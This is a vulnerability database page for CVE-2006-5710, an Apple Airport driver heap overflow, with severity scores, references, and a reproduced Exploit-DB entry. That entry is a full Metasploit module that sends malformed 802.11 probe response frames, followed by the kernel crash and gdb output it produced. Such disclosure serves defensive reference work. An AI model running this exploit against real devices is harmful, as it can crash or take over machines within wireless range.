CVE-2006-5710 : Detail

CVE-2006-5710

Overflow
32.23%V4
Network
2006-11-04
00h00 +00:00
2017-07-19
13h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The Airport driver for certain Orinoco based Airport cards in Darwin kernel 8.8.0 in Apple Mac OS X 10.4.8, and possibly other versions, allows remote attackers to execute arbitrary code via an 802.11 probe response frame without any valid information element (IE) fields after the header, which triggers a heap-based buffer overflow.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 2700

Publication date : 2006-10-31 23h00 +00:00
Author : H D Moore
EDB Verified : Yes

# A proof-of-concept exploit has been added to the Metasploit Framework 3.0 source tree: # msf > use auxiliary/dos/wireless/daringphucball require 'msf/core' module Msf class Auxiliary::Dos::Wireless::DaringPhucball < Msf::Auxiliary include Exploit::Lorcon def initialize(info = {}) super(update_info(info, 'Name' => 'Apple Airport 802.11 Probe Response Kernel Memory Corruption', 'Description' => %q{ The Apple Airport driver provided with Orinoco-based Airport cards (1999-2003 PowerBooks, iMacs) is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning mode, a malformed probe response frame can be used to corrupt internal kernel structures, leading to arbitrary code execution. This vulnerability is triggered when a probe response frame is received that does not contain valid information element (IE) fields after the fixed-length header. The data following the fixed-length header is copied over internal kernel structures, resulting in memory operations being performed on attacker-controlled pointer values. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 3666 $' )) register_options( [ OptInt.new('COUNT', [ true, "The number of frames to send", 2000]), OptString.new('ADDR_DST', [ true, "The MAC address of the target system"]) ], self.class) end # # This bug is easiest to trigger when the card has been placed into active scan mode: # $ /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s -r 10000 # def run open_wifi cnt = datastore['COUNT'].to_i print_status("Creating malicious probe response frame...") frame = create_frame() print_status("Sending #{cnt} frames...") 0.upto(cnt) { |i| wifi.write(frame) } end def eton(addr) addr.split(':').map { |c| c.hex.chr }.join end def create_frame bssid = Rex::Text.rand_text(6) seq = [rand(255)].pack('n') caps = [rand(65535)].pack('n') frame = "\x50" + # type/subtype "\x00" + # flags "\x00\x00" + # duration eton(datastore['ADDR_DST']) + # dst bssid + # src bssid + # bssid seq + # seq Rex::Text.rand_text(8) + # timestamp value Rex::Text.rand_text(2) + # beacon interval Rex::Text.rand_text(2) # capabilities frame << [0x0defaced].pack('N') * ((1024-frame.length) / 4) return frame end end end =begin Tested on a 1.0Ghz PowerBook running 10.4.8 with the latest updates (Halloween, 2006) Unresolved kernel trap(cpu 0): 0x300 - Data access DAR=0x000000000DEFACF7 PC=0x00000000007A2260 Latest crash info for cpu 0: Exception state (sv=0x3AA12A00) PC=0x007A2260; MSR=0x00009030; DAR=0x0DEFACF7; DSISR=0x40000000; LR=0x007A1D48; R1=0x17443B60; XCP=0x0000000C (0x300 - Data access) Backtrace: 0x01BC80AC 0x007A1D48 0x0079FA54 0x0079FF94 0x0079FEBC 0x002D0B94 0x002CFA5C 0x000A9314 Kernel loadable modules in backtrace (with dependencies): com.apple.driver.AppleAirPort(3.4.4)@0x797000 dependency: com.apple.iokit.IONetworkingFamily(1.5.0)@0x5f8000 Proceeding back via exception chain: Exception state (sv=0x3AA12A00) previously dumped as "Latest" state. skipping... Exception state (sv=0x31F13A00) PC=0x00000000; MSR=0x0000D030; DAR=0x00000000; DSISR=0x00000000; LR=0x00000000; R1=0x00000000; XCP=0x00000000 (Unknown) Kernel version: Darwin Kernel Version 8.8.0: Fri Sep 8 17:18:57 PDT 2006; root:xnu-792.12.6.obj~1/RELEASE_PPC (gdb) showcurrentstacks task vm_map ipc_space #acts pid proc command 0x01a73dd8 0x00cdaf3c 0x01a68ef0 38 0 0x003fb200 kernel_task activation thread pri state wait_queue wait_event 0x01a7c000 0x01a7c000 82 R reserved_stack=0x173b0000 kernel_stack=0x17440000 stacktop=0x17443b60 0x17443b60 0x1bc80ac 0x17443be0 0x7a1d48 <com.apple.driver.AppleAirPort + 0xad48> 0x17443c60 0x79fa54 <com.apple.driver.AppleAirPort + 0x8a54> 0x17443ce0 0x79ff94 <com.apple.driver.AppleAirPort + 0x8f94> 0x17443d90 0x79febc <com.apple.driver.AppleAirPort + 0x8ebc> 0x17443df0 0x2d0b94 <_ZN22IOInterruptEventSource12checkForWorkEv+184> 0x17443e40 0x2cfa5c <_ZN10IOWorkLoop10threadMainEv+104> 0x17443e90 0xa9314 <Call_continuation+20> stackbottom=0x17443e90 (gdb) x/3i $pc 0x7a2260 <mhp.1762+3571640>: lbz r8,0(r2) 0x7a2264 <mhp.1762+3571644>: addi r2,r2,1 0x7a2268 <mhp.1762+3571648>: stw r2,0(r11) (gdb) i r $r2 r2 0xdefacf7 233811191 (gdb) x/x $r11 0x17443bb8: 0x0defacf7 (gdb) bt #0 0x007a2260 in mhp.1762 () #1 0x007a1d48 in mhp.1762 () warning: Previous frame identical to this frame (corrupt stack?) #2 0x007a1d48 in mhp.1762 () #3 0x0079fa54 in mhp.1762 () #4 0x0079ff94 in mhp.1762 () #5 0x0079febc in mhp.1762 () #6 0x002d0b94 in IOInterruptEventSource::checkForWork (this=0x1d80d40) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOInterruptEventSource.cpp:196 #7 0x002cfa5c in IOWorkLoop::threadMain (this=0x1d803c0) at /SourceCache/xnu/xnu-792.12.6/iokit/Kernel/IOWorkLoop.cpp:267 (gdb) x/40x $r1 0x17443b60: 0x17443be0 0x22424022 0x01bc80ac 0x00000038 0x17443b70: 0x00d43c54 0x0004ffff 0x01bc81f4 0x00000210 0x17443b80: 0x02275000 0x003d8000 0x004fa418 0x00365000 0x17443b90: 0x01d803c0 0x00033e88 0x01a7c01c 0x01a7c0a4 0x17443ba0: 0x0defaced 0x01bc8000 0x0227581e 0x0defacf7 0x17443bb0: 0x00000000 0x0227581e 0x0defacf7 0x00000001 0x17443bc0: 0x00000002 0x01bc81f4 0x00000000 0x00000000 0x17443bd0: 0x17443c10 0x01a858c0 0x17443be0 0x01d80d40 0x17443be0: 0x17443c60 0x01bc81f4 0x007a1d48 0x00000000 0x17443bf0: 0x17443c20 0x00008088 0x01bc8000 0x0227581e =end # milw0rm.com [2006-11-01]

Products Mentioned

Configuraton 0

Apple>>Mac_os_x >> Version 10.4.8

Opendarwin>>Darwin_kernel >> Version 8.8.0

    References

    http://www.vupen.com/english/advisories/2006/4750
    Tags : vdb-entry, x_refsource_VUPEN
    http://securitytracker.com/id?1017151
    Tags : vdb-entry, x_refsource_SECTRACK
    http://www.osvdb.org/30180
    Tags : vdb-entry, x_refsource_OSVDB
    http://www.vupen.com/english/advisories/2006/4313
    Tags : vdb-entry, x_refsource_VUPEN
    http://www.securityfocus.com/bid/20862
    Tags : vdb-entry, x_refsource_BID
    http://secunia.com/advisories/23155
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.kb.cert.org/vuls/id/191336
    Tags : third-party-advisory, x_refsource_CERT-VN
    http://www.us-cert.gov/cas/techalerts/TA06-333A.html
    Tags : third-party-advisory, x_refsource_CERT
    http://secunia.com/advisories/22679
    Tags : third-party-advisory, x_refsource_SECUNIA